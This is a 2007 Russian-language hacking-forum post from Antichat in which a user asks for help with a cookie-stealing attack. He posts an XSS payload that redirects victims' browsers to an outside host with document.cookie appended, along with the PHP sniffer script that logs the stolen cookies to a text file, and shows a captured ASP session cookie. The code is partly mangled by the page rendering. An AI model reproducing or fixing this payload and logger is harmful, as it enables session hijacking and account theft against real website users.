HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Нужна помощь. Видать в запросе...
  #1  
Старый 04.03.2007, 15:37
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
С нами: 10194133

Репутация: 0
Cool Нужна помощь. Видать в запросе...

Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qtdocument.location.href="http://www.humora.net.ru/Files/sniff.php"document.cookie; </script&qt
Где sniff.php содержит такие строки:
PHP код:
<?
 $f 
fopen("snif.txt""a");
 
fwrite($f$REQUEST_URI);
 
fclose($f);
 print(
"OK");
?&
qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie
Подскажите че нетак, плиз, а то не знаю уже че за фигня
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна помощь! Black_Death Болталка 7 11.12.2004 16:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.